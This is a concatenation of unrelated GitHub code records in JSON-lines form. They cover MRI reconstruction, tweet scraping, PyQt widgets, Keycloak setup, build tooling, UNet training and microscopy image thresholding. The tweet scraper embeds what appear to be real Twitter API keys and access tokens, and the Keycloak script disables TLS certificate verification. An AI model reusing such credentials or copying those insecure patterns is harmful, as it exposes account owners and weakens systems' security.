sens_maps_enc, mask_enc = input_elems\n Encoder = data_consistency(sens_maps_enc, mask_enc, basis, stk)\n nw_output_image = Encoder.Supervised_single_image(nw_output_enc)\n\n return nw_output_image\n\n kspace = tf.map_fn(supervised_map_fn, (nw_output, sens_maps, mask), dtype=tf.complex64, name='supervisedmap_single_i_Fn')\n\n return tf_utils_subspace.tf_complex2real(kspace)\n\n","repo_name":"yohan-jun/Zero-DeepSub","sub_path":"data_consistency_subspace.py","file_name":"data_consistency_subspace.py","file_ext":"py","file_size_in_byte":9223,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"30836195875","text":"import tweepy\nimport time\nimport sys\n\n#Search\n#Search is rate limited at 180 queries per 15 minute window.\n#https://dev.twitter.com/rest/public/timelines\n\n\nconsumer_key = 'n2WebZuPpCWG9xguQ9Nx6sJLW'\nconsumer_secret = 'WTfshJzVzrSaWuT4hjEtlV6KivAQa79unN9eCCGIrtduQtQ8vr'\naccess_token = '70616645-l81XYFgtS7E9a2WsrlC5OHE8OqM2ywC3aV28MPMMN'\naccess_token_secret = '67r1dgZvJwhse1z8hl026pSsZESwkuzVZfRekBdvvqTct'\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth)\n\nfilename = 'data38.csv'\n\nsaveFile = open(filename, 'a')\n\nuser_id = ['WarrenBuffett', 'aswathdamodaran']\n#user_id = ['WarrenBuffett']\n\nlistofword = ['hope', 'happy', 'fear', 'worry','nervous','anxious','upset', 'positive', 'negative']\ncompanylist = ['AAPL','Apple Inc']\n\nteststring = 'fear and FEAR and worry and upset and what I can do, NERVOUS'\n\n\n\ndef checkCompany(companylist, str_check_company):\n\n for i in range (len(companylist)):\n if companylist[i].lower() in str_check_company.lower():\n return '1'\n return '0'\n 
saveFile.write('\\t')\n\ndef checkWord(listofword, str_check_word):\n counter = 0\n frequency = []\n total_number_of_word = len(str_check_word.split())\n frequency.append(total_number_of_word)\n for i in range (len(listofword)):\n y = listofword[i]\n if y in str_check_word.lower():\n counter = str_check_word.lower().count(y)\n frequency.append( counter )\n else:\n frequency.append( 0 )\n #print (listofword[i], counter)\n #print ('\\n')\n return frequency\n#print (frequency)\n\n\ndef getTweet(user_id):\n #initialize a list to hold all the tweepy Tweets\n alltweets = []\n\n #make initial request for most recent tweets (200 is the maximum allowed count)\n new_tweets = api.user_timeline(id=user_id ,count=200)\n\n #save most recent tweets\n alltweets.extend(new_tweets)\n\n #save the id of the oldest tweet less one\n oldest = alltweets[-1].id - 1\n\n #keep grabbing tweets until there are no tweets left to grab\n while len(new_tweets) > 0:\n print (\"getting tweets before %s\" % (oldest))\n\n #all subsiquent requests use the max_id param to prevent duplicates\n new_tweets = api.user_timeline(id=user_id,count=200,max_id=oldest)\n\n #save most recent tweets\n alltweets.extend(new_tweets)\n\n #update the id of the oldest tweet less one\n oldest = alltweets[-1].id - 1\n\n print (\"...%s tweets downloaded so far\" % (len(alltweets)))\n\n for tweet in alltweets:\n #transform the tweepy tweets into a 2D array\n outtweets = [[tweet.id_str, tweet.created_at, tweet.text.encode(\"utf-8\")] for tweet in alltweets]\n\n\n for i in range(len(outtweets)):\n saveFile.write(user_id)\n saveFile.write('\\t')\n str_check_company = str(outtweets[i][2])\n y = checkCompany(companylist, str_check_company)\n saveFile.write(y)\n saveFile.write('\\t')\n #Frequency_of_word = []\n\n\n Frequency_of_word = checkWord(listofword, str(outtweets[i][2]))\n\n for fre in range (len (Frequency_of_word)) :\n saveFile.write('\\t')\n saveFile.write(str(Frequency_of_word[fre]))\n saveFile.write('\\t')\n\n\n for j in range (len(outtweets[i])):\n# print(outtweets[i][j], end = '\\t')\n saveFile.write(str(outtweets[i][j]))\n saveFile.write('\\t')\n #str_check_company = str(outtweets[i][2])\n print('\\n')\n saveFile.write('[end of tweets here]')\n saveFile.write('\\t')\n saveFile.write('\\n')\n\n\nfor i in range(len(user_id)):\n getTweet(user_id[i])\n\n\n\nsaveFile.close()\n\n################test function###############\n#checkWord(listofword, teststring)","repo_name":"wmisley/tndy-405i-project","sub_path":"assignment_1/twitter_tweet_query.py","file_name":"twitter_tweet_query.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12700369207","text":"from PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QGroupBox, QCheckBox, QVBoxLayout, QRadioButton, QLabel, QButtonGroup, QMessageBox\n\n\nclass MyRadioButton(QGroupBox):\n\n def __init__(self, parent): # self는 MyApp 객체\n super().__init__()\n self.QMainWidow = parent\n self.setTitle('QRadioButton')\n self.init_ui()\n\n def init_ui(self):\n rbtn1 = QRadioButton('First Button', self)\n rbtn1.setChecked(True)\n\n rbtn2 = QRadioButton(self)\n rbtn2.setText('Second Button')\n\n rbtn3 = QRadioButton(self)\n rbtn3.setText('status Toggle')\n\n self.lbl = QLabel('')\n\n rbtn1.clicked.connect(lambda: self.lbl.setText(rbtn1.text()))\n # rbtn2.clicked.connect(lambda: self.lbl.setText(rbtn2.text()))\n # rbtn1.clicked.connect(lambda state, btn=rbtn1: self.set_lblText(state, btn))\n 
rbtn2.clicked.connect(lambda state, btn=rbtn2: self.set_lblText(state, btn))\n\n rbtn3.clicked.connect(lambda state, button=rbtn3: self.show_message(state, button))\n\n rbtn3.toggled.connect(lambda: self.QMainWidow.statusBar().showMessage('rbtn {}'.format(rbtn3.isChecked())))\n\n btn_group = QButtonGroup()\n btn_group.addButton(rbtn1)\n btn_group.addButton(rbtn2)\n btn_group.addButton(rbtn3)\n\n vbox = QVBoxLayout()\n vbox.addWidget(rbtn1)\n vbox.addWidget(rbtn2)\n vbox.addWidget(rbtn3)\n vbox.addWidget(self.lbl)\n\n self.setLayout(vbox)\n\n def set_lblText(self, state, button):\n self.lbl.setText(\"state {} button {}\".format(state, button.text()))\n\n def show_message(self, state, button):\n QMessageBox.information(self, 'lambda test', 'rbtn3 text ' + button.text(), QMessageBox.Yes)\n","repo_name":"MinSu-Kim/pyqt_study","sub_path":"widget/radiobutton.py","file_name":"radiobutton.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"2109712693","text":"import os\nimport sys\nimport requests\nimport simplejson as json\nfrom utils import printResponse, enableHttpDebugLevel, formatedLogs\nfrom httpUtils import httpCommonHeaders, getAccessToken, createRealm\nfrom protocolMapper import ProtocolMapper\nfrom protocols import Protocols\n\n# from dotenv import load_dotenv\n# load_dotenv()\n\ntry:\n if os.environ[\"HTTP_DEBUG\"] == \"true\":\n enableHttpDebugLevel()\n\n username = os.environ[\"USER_NAME\"]\n password = os.environ[\"PASSWORD\"]\n adminClientId = os.environ[\"ADMIN_CLIENT_ID\"]\n keycloakHost = os.environ[\"KEYCLOAK_HOSTNAME\"]\n keycloakRealm = os.environ[\"KEYCLOAK_REALM\"]\n\n # get token\n access_token = getAccessToken(keycloakHost, os.environ[\"MASTER_REALM\"], username, password, adminClientId, False)\n \n # Create realm\n createRealm(keycloakHost, keycloakRealm, access_token, False)\n print(\"Set up Openshift identity provider on keycloak\")\n response = requests.post(\"{}/auth/admin/realms/{}/identity-provider/instances\".format(keycloakHost, keycloakRealm),\n headers = httpCommonHeaders(access_token),\n json = {\n \"addReadTokenRoleOnCreate\": \"\",\n \"alias\": \"openshift-v4\",\n \"authenticateByDefault\": False,\n \"config\": {\n \"baseUrl\": os.environ[\"OPENSHIFT_BROKER_API_SERVER\"],\n \"clientId\": os.environ[\"OPENSHIFT_BROKER_CLIENT_ID\"],\n \"clientSecret\": os.environ[\"OPENSHIFT_BROKER_CLIENT_SECRET\"],\n \"disableUserInfo\": \"\",\n \"hideOnLoginPage\": \"\",\n \"syncMode\": \"IMPORT\",\n \"useJwksUrl\": \"true\",\n },\n \"displayName\": os.environ[\"OPENSHIFT_BROKER_DISPLAY_NAME\"],\n \"enabled\": True,\n \"firstBrokerLoginFlowAlias\": \"first broker login\",\n \"linkOnly\": \"\",\n \"postBrokerLoginFlowAlias\": \"\",\n \"providerId\": \"openshift-v4\",\n \"storeToken\": \"\",\n \"trustEmail\": \"\",\n }, verify=False)\n\n if (response.status_code == 201 or response.status_code == 409):\n printResponse(response)\n \nexcept (KeyError): \n print(\"Please set the environment variable\")\n sys.exit(1)","repo_name":"otp-demo/rhsso-auto","sub_path":"openshift-brokering.py","file_name":"openshift-brokering.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21126834389","text":"import argparse\nimport subprocess\nimport os\nimport shutil\n\n\nREPO_URL = \"https://github.com/vektra/mockery.git\"\nREPO_DIR = \"mockery_repo\"\nBINARY_NAME = \"mockery\"\n\n\ndef 
create_asset(target_dir):\n \"\"\"Create the asset.\"\"\"\n os.chdir(target_dir)\n\n # We build mockery 2.4.0 from source to fix an issue with Go 1.18. Read the\n # comments below for details.\n output = subprocess.check_output([\"git\", \"clone\", REPO_URL, REPO_DIR])\n print(output)\n os.chdir(os.path.join(target_dir, REPO_DIR))\n output = subprocess.check_output([\"git\", \"checkout\", \"v2.4.0\"])\n\n # Under Go 1.18, mockery v2.4.0 through v2.10.0 fails with errors such as:\n #\n # internal error: package \"fmt\" without types was imported from ...\n #\n # This can be fixed by updating golang.org/x/tools to a more recent version.\n # For more details, please see https://github.com/vektra/mockery/issues/434\n # and https://github.com/golang/go/issues/49608.\n output = subprocess.check_output([\"go\", \"get\", \"golang.org/x/tools@v0.1.10\"])\n print(output)\n output = subprocess.check_output([\"go\", \"mod\", \"tidy\"])\n print(output)\n\n # Build mockery with the same flags as in release builds.\n #\n # If we don't specify a SemVer value, mockery will generate files with a\n # \"Code generated by mockery v0.0.0-dev. DO NOT EDIT.\" comment at the top,\n # which causes diffs due to the changed version. Thus, it is important to set\n # the SemVer value to the correct version.\n #\n # See\n # https://github.com/vektra/mockery/blob/271c74610ef710a4c30e19a42733796c50e7ea3f/.goreleaser.yml#L9.\n ldflags = \"-s -w -X github.com/vektra/mockery/v2/pkg/config.SemVer=2.4.0\"\n build_command = [\"go\", \"build\", \"-ldflags=\\\"%s\\\"\" % ldflags]\n print(\"Building with command:\", build_command)\n output = subprocess.check_output([\"go\", \"build\", \"-ldflags=\" + ldflags])\n print(output)\n\n # Copy binary outside of the cloned repository directory and clean up.\n output = subprocess.check_output([\"cp\", BINARY_NAME, \"..\"])\n shutil.copy(os.path.join(target_dir, REPO_DIR, BINARY_NAME), target_dir)\n shutil.rmtree(os.path.join(target_dir, REPO_DIR))\n os.chdir(target_dir)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--target_dir', '-t', required=True)\n args = parser.parse_args()\n create_asset(args.target_dir)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"google/skia","sub_path":"infra/bots/assets/mockery/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":8112,"dataset":"github-code","pt":"81"} +{"seq_id":"38422138358","text":"import torch\nimport cv2\nimport os\nimport glob\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nimport random\nimport PIL.Image as Image\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\nfrom Unet1 import Unet1\nimport matplotlib.pyplot as plt\n\n# 按批次取数据\nclass CAR_Loader(Dataset):\n def __init__(self, data_path):\n # 初始化函数,读取所有data_path下的图片\n self.data_path = data_path\n self.imgs_path = glob.glob(self.data_path+'/image/*.jpg')\n self.label_path = glob.glob(self.data_path+'/label/*.jpg')\n # 数据预处理,输入图片大小一致\n self.trans = transforms.Compose([\n transforms.Resize((512, 512)), #2^n\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n def __getitem__(self, index):\n # 根据index读取图片地址\n image_path = self.imgs_path[index]\n # 根据index读取label图片地址\n label_path = self.label_path[index]\n # 读取训练图片和标签图片\n image = Image.open(image_path)\n label = Image.open(label_path)\n # 图片预处理\n image = self.trans(image)\n label = self.trans(label)\n return image, label\n\n def 
__len__(self):\n # 返回训练集大小\n return len(self.imgs_path)\n\n\n# 训练模型\ndef fit_model(batch_1,epochs_1,lr,net,save_path):\n train_loss_l = []\n val_loss_l = []\n #参数设置\n lr = lr\n batch_size = batch_1\n epochs = epochs_1\n best_loss = 10.0\n # gpu or cpu\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n print(\"using {} device.\".format(device))\n\n train_car_dataset = CAR_Loader(\"./data\")\n train_num = len(train_car_dataset)\n\n\n\n #读取图片时的线程数\n nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 12]) # number of workers\n print('Using {} dataloader workers every process'.format(nw))\n\n train_loader = torch.utils.data.DataLoader(train_car_dataset,\n batch_size=batch_size, shuffle=True,\n num_workers=nw)\n val_car_dataset = CAR_Loader(\"./data\")\n val_num = len(val_car_dataset)\n validate_loader = torch.utils.data.DataLoader(val_car_dataset,\n batch_size=batch_size, shuffle=False,\n num_workers=nw)\n print(\"using {} images for training, {} images for validation.\".format(train_num,\n val_num))\n net.to(device)\n loss_function = nn.MSELoss()\n optimizer = optim.Adam(net.parameters(), lr)\n\n train_steps = len(train_loader)\n val_steps = len(validate_loader)\n\n for epoch in range(epochs):\n # train\n net.train()\n running1_loss = 0.0\n running2_loss = 0.0\n for data in train_loader:\n images, labels = data\n optimizer.zero_grad()\n # print(images.shape)\n outputs=net(images.to(device))\n loss = loss_function(outputs, labels.to(device))\n loss.backward()\n optimizer.step() # 根据反向传播区队优化器更新\n\n # print statistics\n running1_loss += loss.item()\n\n train_loss_l.append(running1_loss / train_steps)\n # validate\n net.eval()\n with torch.no_grad():\n for val_data in validate_loader:\n val_images, val_labels = val_data\n outputs = net(val_images.to(device)) # eval model only have last output layer\n val_loss = loss_function(outputs, val_labels.to(device))\n running2_loss += val_loss.item()\n\n val_loss_l.append(running2_loss / val_steps)\n\n print('[epoch %d] train_loss: %.3f val_loss: %.3f \\n' %\n (epoch + 1, running1_loss / train_steps, running2_loss / val_steps))\n\n if (running2_loss / val_steps) < best_loss:\n best_loss = (running2_loss / val_steps)\n torch.save(net.state_dict(), save_path) #找到最优loss,保存训练的权重和地址\n\n p = best_loss\n np.save('val_loss.npy', val_loss_l)\n np.save('train_loss.npy', train_loss_l)\n print('Finished Training')\n return p\n\n\ndef main():\n epoch = 100\n batch_size = 64\n lr = 0.0001\n save_path = './model.pth'\n net1 = Unet1()\n # net1.load_state_dict(torch.load('model.pth'))\n p1 = fit_model(batch_size, epoch, lr, net1, save_path)\n print(\" epoch(\", epoch, \") model train_max:\", p1)\n\n\nif __name__ == '__main__':\n main()","repo_name":"LeoLuo0115/MachineLearning_LicensePlateDetation_Project-","sub_path":"train_Unet.py","file_name":"train_Unet.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18114612819","text":"import operator\r\ninstr = \"\"\"널 품기 전 알지 못했다. 
내 머문 세상 이토록 찬란한 것을 작은 숨결로 닿은 사랑 겁없이 나를 불러준 사랑.\r\n몸시도 좋 았다 너를 지켜보고 설레고 우습게 지투도 했던 평번한 모든 순간들이 캄캄한 영원 그 오랜 기다림 속으로 햇살처럼 니가 내렸다.\"\"\"\r\ncdic = {}\r\nclist = []\r\nif __name__ == \"__main__\":\r\n for ch in instr:\r\n if \"ㄱ\" <= ch and ch <= \"힣\":\r\n if ch in cdic:\r\n cdic[ch]+=1\r\n else:\r\n cdic[ch] =1\r\n clist = sorted(cdic.items(),key = operator.itemgetter(1),reverse = True)\r\n print(\"원문\\n\",instr)\r\n print(\"--------------------\")\r\n print(\"문자 \\t 빈도수\")\r\n print(\"--------------------\")\r\n for i in range(0,len(clist)):\r\n print(clist[i][0], '\\t',clist[i][1])\r\n##2019038085_이현도##\r\n","repo_name":"leehyeondol/opensource_5week","sub_path":"기초-5주차과제2번-이현도.py","file_name":"기초-5주차과제2번-이현도.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16273229804","text":"import os\nimport logging\nimport json\nimport yaml\n\nfile_dir = os.path.dirname(__file__)\ndir_path = os.path.join(file_dir, '../')\npattern_root = os.path.abspath(dir_path)\n\n\ndef mkdirs(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\n\ndef log_dir():\n path = os.path.join(pattern_root, 'logs')\n mkdirs(path)\n return path\n\n\ndef system(cmd):\n import subprocess\n ret = subprocess.call(cmd, shell=True)\n return ret\n\n\ndef events():\n ret = ['configure']\n\n parameters = read_parameters()\n if 'cloudconductor' in parameters and \\\n parameters['cloudconductor'] is not None and \\\n 'applications' in parameters['cloudconductor'] and \\\n parameters['cloudconductor']['applications'] is not None:\n ret.append('deploy')\n\n return ret\n\n\ndef execute_serverspec(roles):\n ret = 0\n\n roles.insert(0, 'all')\n event_list = events()\n\n test_root = os.path.join(pattern_root, 'serverspec')\n spec_dir = os.path.join(test_root, 'spec')\n\n for role in roles:\n for event in event_list:\n spec_file = os.path.join(\n spec_dir, role, role + '_' + event + '_spec.rb')\n if os.path.exists(spec_file):\n logging.info('execute serverspec with [%s].', spec_file)\n\n cmd = 'cd ' + test_root + \\\n '; rake spec[' + role + ',' + event + ']'\n result = system(cmd)\n\n if result == 0:\n logging.info('finished successfully.')\n else:\n logging.error('finished abnormally.')\n ret = 1\n\n else:\n logging.info(\n 'spec file [%s] does not exist. 
skipped.', spec_file)\n\n return ret\n\n\ndef env(name):\n return os.environ.get(name)\n\n\ndef token_key():\n return env('CONSUL_SECRET_KEY')\n\n\ndef consul_kv_get(key):\n import consul\n c = consul.Consul()\n index, data = c.kv.get(key, token=token_key())\n obj = json.loads(data['Value'])\n return obj\n\n\ndef read_parameters():\n try:\n ret = consul_kv_get('cloudconductor/parameters')\n except Exception as e:\n logging.warn(\"%s: %s\", type(e), e.message)\n ret = {}\n return ret\n\n\nif __name__ == '__main__':\n import sys\n argvs = sys.argv\n argc = len(argvs)\n\n roles = argvs[1].split(',')\n\n LOG_FILE = os.path.join(log_dir(), 'event-handler.log')\n logging.basicConfig(filename=LOG_FILE,\n format='[%(asctime)s] %(levelname)s: %(message)s',\n level=logging.DEBUG)\n\n ret = execute_serverspec(roles)\n exit(ret)\n","repo_name":"cloudconductor-patterns/zabbix_pattern","sub_path":"lib/serverspec.py","file_name":"serverspec.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"15455553198","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n current = []\n head = resultCurrent = ListNode(0)\n \n for i in range(len(lists)):\n current.append(lists[i])\n \n\n def argmin(listCurrents:[ListNode]):\n \n currentVal = 9999999\n currentIdx = -1\n\n for i in range(len(listCurrents)):\n if listCurrents[i]:\n if listCurrents[i].val < currentVal:\n currentVal = listCurrents[i].val\n currentIdx = i\n \n return currentIdx\n \n idx = argmin(current)\n while idx != -1:\n resultCurrent.next = current[idx]\n resultCurrent = current[idx]\n current[idx] = current[idx].next\n idx = argmin(current)\n\n return head.next","repo_name":"sqlxx/algo-python","sub_path":"merge_k_sorted_list.py","file_name":"merge_k_sorted_list.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"20927152992","text":"'''s8_210316_dj.py is from s8_210315.py\r\n imports organized\r\n with 2 new user inputs at start of execution:\r\n - ask whether to execute interactive graphics function\r\n - ask what thresholding method to use\r\n'''\r\n\r\n\r\n# Standard imports\r\nimport numpy as np #best friend\r\nimport os #selecting files\r\nimport time #timing\r\nimport sys #input arguements\r\nimport psutil #memory watching\r\nfrom tqdm import tqdm # progress bar\r\nimport tkinter as tk #for gui to select variables\r\nfrom tkinter import filedialog #to open manager to select folders\r\nimport time\r\n\r\n# Reading/writing files\r\nimport pickle as pkl #writing output file\r\nfrom pims import TiffStack #reading tif data\r\nfrom tifffile import imsave #saving tif images\r\nimport csv #saving csv files\r\n\r\n# Thresholding and cropping\r\nfrom skimage import morphology #multicrop\r\nfrom skimage.filters import threshold_triangle, threshold_yen,threshold_otsu, gaussian # adaptive_thresholding\r\nfrom skimage.measure import label, regionprops # multicrop and three tracker for both\r\nfrom scipy import stats #adaptive_thresholding but commented out\r\n\r\n# Filtering\r\nfrom scipy.signal import savgol_filter # new function for sav filter\r\n#from math import factorial #used in defined savitzky_golay function\r\n#from skimage.restoration import(denoise_tv_chambolle) #used in savitzky_golay but commented 
out\r\n\r\n# Graphics\r\nimport matplotlib as mpl \r\nimport matplotlib.pyplot as plt \r\nimport matplotlib.cm as cm \r\nfrom matplotlib.backends.backend_pdf import PdfPages \r\nfrom mpl_toolkits.mplot3d import Axes3D \r\n\r\n\r\n\r\n\r\n# Interactive Graphics\r\n#import pandas as pd \r\n#from bokeh.plotting import figure, output_file, show\r\n#from bokeh.layouts import row \r\n#import plotly.express as px \r\n#import plotly.graph_objects as go \r\n#import dash_html_components as html \r\n#from plotly.subplots import make_subplots \r\n\r\n# Not used\r\n#from skimage import util, filters, img_as_uint\r\n#import trackpy as tp \r\n#import matplotlib.style \r\n#import math \r\n#import scipy\r\n#import pims \r\n#import skimage \r\n#import matplotlib.patches as mpatches \r\n#from pims import Frame \r\n#from PIL import Image \r\n#import dash \r\n#import dash_core_components as dcc \r\n#from dash.dependencies import Input, Output \r\n\r\n#######################################################################################\r\nt_start = time.time()\r\nstart_ram = psutil.virtual_memory()[3]/1000000000\r\n\r\ndef adaptive_thresholding(yval, var_otsu, var_gate, value_inside):\r\n\r\n #tau = np.divide(np.multiply(np.shape(yval)[1],np.shape(yval)[2]),50000) #probably should have a check for image dims...\r\n #print(tau)\r\n if var_otsu:\r\n tau = 0.95\r\n else:\r\n tau = 0\r\n #tau = np.std(yval[0], axis = 0)\r\n #tau = np.mean(tau)\r\n #tau = 100*np.divide(tau, data_max)\r\n #print(tau)\r\n #---------------------------------------\r\n #Blur and Noise Gating\r\n #-------------------------------------------\r\n yval = np.array(yval, dtype=np.int32)\r\n #mode filter\r\n #-----------------------------------------\r\n #mode = stats.mode(yval, axis = 0)\r\n #nf = np.clip(yval,a_min = 0, a_max = mode[0][0])\r\n #rf = stats.mode(nf, axis = 0)\r\n #yval = yval - np.multiply(rf[0],0.3)\r\n #---------------------------------------\r\n #mean filter\r\n mean_floor = np.mean(yval, axis = 0)\r\n nf = np.clip(yval, a_min = 0, a_max = mean_floor)\r\n rf = np.mean(nf, axis = 0)\r\n rf = np.array(rf, dtype=np.uint32)\r\n if var_gate:\r\n yval = yval - np.multiply(rf,1.4)\r\n else:\r\n yval = yval\r\n yval[yval < 0] = 0\r\n yval = np.array(yval, dtype=np.int16)\r\n #imsave(raw_path + '/' +filename + '_floor.tif', yval) #save the mask\r\n #print(nf)\r\n #yval = yval - np.median(yval, axis = 0) - np.std(yval, axis = 0)\r\n #---------------------------------------------------------\r\n ##yval = np.array(yval)\r\n #imsave(raw_path +\"/\" + filename + \"_filtered.tif\", yval)\r\n print('tau: {0}'.format(str(tau)))\r\n blurred = gaussian(yval, sigma = (0,tau, tau)) #blur the image\r\n if value_inside in ['Otsu']:\r\n gauss_thresh = threshold_otsu(blurred[:]) #find the threshold\r\n elif value_inside in ['Yen']:\r\n gauss_thresh = threshold_yen(blurred[:])\r\n elif value_inside in ['Triangle']:\r\n gauss_thresh = threshold_triangle(blurred[:])\r\n\r\n binary_gauss = blurred > gauss_thresh #convert to binary\r\n #binary_gauss_image = np.asarray(binary_gauss, dtype = 'uint8')#convert to boolean #IS THIS USED?\r\n #imsave(raw_path + '/' +filename + '_binary.tif', binary_gauss_image) #save the mask\r\n binary_gauss = np.asarray(binary_gauss, dtype = bool) #convert to boolean\r\n return binary_gauss\r\ndef masker(binary_gauss, yval):\r\n mask = np.multiply(binary_gauss,yval) #make the mask\r\n m_file = temp_full_filename.replace('.tif','_mask.tif')\r\n imsave(m_file, mask) #save the mask \r\n return mask\r\ndef masker_sum(mask):\r\n 
sum_mask = np.sum(mask,axis=0,dtype='uint64') #create the summed mask\r\n #imsave(raw_path + \"/\" + filename + '_sum_mask.tif', sum_mask) \r\n return sum_mask\r\ndef particle_sum(binary_gauss):\r\n sum_particle = np.sum(binary_gauss, axis=0,dtype='uint32') #render the binary #MADE uint64 INCASE DATA FILE IS 32BIT \r\n sum_particle[sum_particle != 0] = 255 #scale the binary for viewing #THIS FORCES 8BIT IMAGE, IS THAT OK?\r\n #imsave(raw_path + \"/\" + filename + '_sum_particle.tif',sum_particle)\r\n return sum_particle\r\ndef multicrop(sum_particle, binary_gauss, mask):\r\n label_sum = label(sum_particle)\r\n label_sum = morphology.remove_small_objects(label_sum,min_size = 10, in_place = True, connectivity = 2)# slice filtering \r\n boxes = [region.bbox for region in regionprops(label_sum)]\r\n boxes = np.asarray(boxes, dtype = int)\r\n #print(len(boxes))\r\n #print(label_sum)\r\n label_sum = np.asarray(label_sum, dtype='uint8') #DONT THINK THIS IS USED AFTER HERE, SO uint8 CAN STAY?\r\n cropped_mask = {x: mask[:,boxes[x][0]:boxes[x][2],boxes[x][1]:boxes[x][3]] for x in range(len(boxes))}\r\n\t\r\n #[imsave(raw_path +\"/\" + filename + \"_cropped\" + str(key) +\".tif\",cropped_mask[key]) for key in cropped_mask]\r\n #print(boxes)\r\n #return np.array(list(cropped_mask[2]))\r\n return cropped_mask, boxes\r\n #---------------------------------------------------------------------------------------------------------------\r\n# Three Tracker\r\n#---------------------------------------------------------------------------------------------------------------- \r\ndef three_tracker(tal, k, cropped_mask, boxes, raw_path):\r\n #print(\"ram before flab:\",psutil.virtual_memory()[3]/1000000000-start_ram)\r\n #intensity_image = cropped_mask\r\n #imsave(raw_path + '/' +filename + '_intensity.tif', intensity_image) #save the mask\r\n cropped_binary = cropped_mask.astype(bool).astype(int)\r\n #cropped_binary = adaptive_thresholding(cropped_mask, 0)\r\n #problem area\r\n #cropped_binary[cropped_binary != 0] = 155 \r\n sum_particle = np.sum(cropped_binary, axis=0,dtype='uint32') #render the binary \r\n sum_particle[sum_particle != 0] = 255 #scale the binary for viewing\r\n sum_mask = np.sum(cropped_mask,axis=0,dtype='uint32') #create the summed mask\r\n f_lab = label(cropped_binary)\r\n #print(\"ram after flab:\",psutil.virtual_memory()[3]/1000000000-start_ram) \r\n #f_lab = morphology.remove_small_objects(f_lab,min_size = 5000, in_place = True, connectivity = 3)# voxel filtering \r\n point = [region.centroid for region in regionprops(f_lab)]\r\n f_coords = [region.coords for region in regionprops(f_lab)] \r\n f_box = [region.bbox for region in regionprops(f_lab)] \r\n point = np.asarray(point, dtype = int)\r\n point = point[:,(1,2)]\r\n sum_label = label(sum_particle)\r\n sum_coords = [region.coords for region in regionprops(sum_label)] \r\n sum_coords = np.asarray(sum_coords) \r\n label_sum = label(sum_particle)\r\n sites = np.max(label_sum) \r\n events = {} \r\n serial = {}\r\n print(\"time series analysis:\") \r\n #The splitting code\"\r\n sum_box = np.array([region.bbox for region in regionprops(label_sum)])\r\n #print(sum_box)\r\n #print(len(sum_box)) \r\n obj = {}\r\n obj = [f_lab[:, sum_box[x,0]:sum_box[x,2], sum_box[x,1]:sum_box[x,3]] for x in range(len(sum_box))] #do the subslicing\r\n #obj = f_lab\r\n obj[0] = np.asarray(obj[0], dtype = 'uint8')\r\n #imsave(raw_path + \"/\" + filename + \"_obj.tif\", obj[0])\r\n #rint(boxes[k-1])\r\n \r\n \r\n for i in tqdm(range(len(point))): \r\n t0 = 
time.time()\r\n binary_region = f_lab == i+1 \r\n t1 = time.time()\r\n #print(t1-t0)\r\n binary_region[binary_region > 1 ] = 1\r\n t2 = time.time()\r\n #print(t2-t1) \r\n spacers = np.zeros(((2*len(binary_region)))*len(binary_region[0,:])*len(binary_region[0,0,:])) \r\n spacers = spacers.reshape((2*len(binary_region)),len(binary_region[0,:]),len(binary_region[0,0,:]))\r\n spacers[0::2] = binary_region\r\n space_lab = label(spacers)\r\n #space_lab = morphology.remove_small_objects(space_lab,min_size = 500, in_place = True, connectivity = 2)# slice filtering \r\n space_lab = space_lab[0::2] \r\n particle_mask = np.zeros_like(f_lab)\r\n particle_mask[f_box[i][0]:f_box[i][3],f_box[i][1]:f_box[i][4],f_box[i][2]:f_box[i][5]] = np.multiply(space_lab[f_box[i][0]:f_box[i][3],f_box[i][1]:f_box[i][4],f_box[i][2]:f_box[i][5]], binary_region[f_box[i][0]:f_box[i][3],f_box[i][1]:f_box[i][4],f_box[i][2]:f_box[i][5]])\r\n t3 = time.time()\r\n #print(t3-t2)\r\n p_amp = [region.mean_intensity for region in regionprops(particle_mask, intensity_image = cropped_mask)]\r\n #print(p_amp)\r\n t4 = time.time()\r\n #print(t4-t3)\r\n p_area = [region.area for region in regionprops(particle_mask)] \r\n t5 = time.time()\r\n #print(np.max(p_area))\r\n #print(t5-t4)\r\n p_cent = [region.centroid for region in regionprops(particle_mask)]\r\n #p_cent = list(p_cent)\r\n #print(p_cent[0])\r\n t6 = time.time()\r\n #print(t6-t5)\r\n p_region = [region.coords for region in regionprops(particle_mask)] \r\n t7 = time.time()\r\n #print(t7-t6)\r\n p_cent = np.asarray(p_cent)\r\n t8 = time.time()\r\n #print(t8-t7)\r\n p_coords = np.vstack(p_region)\r\n 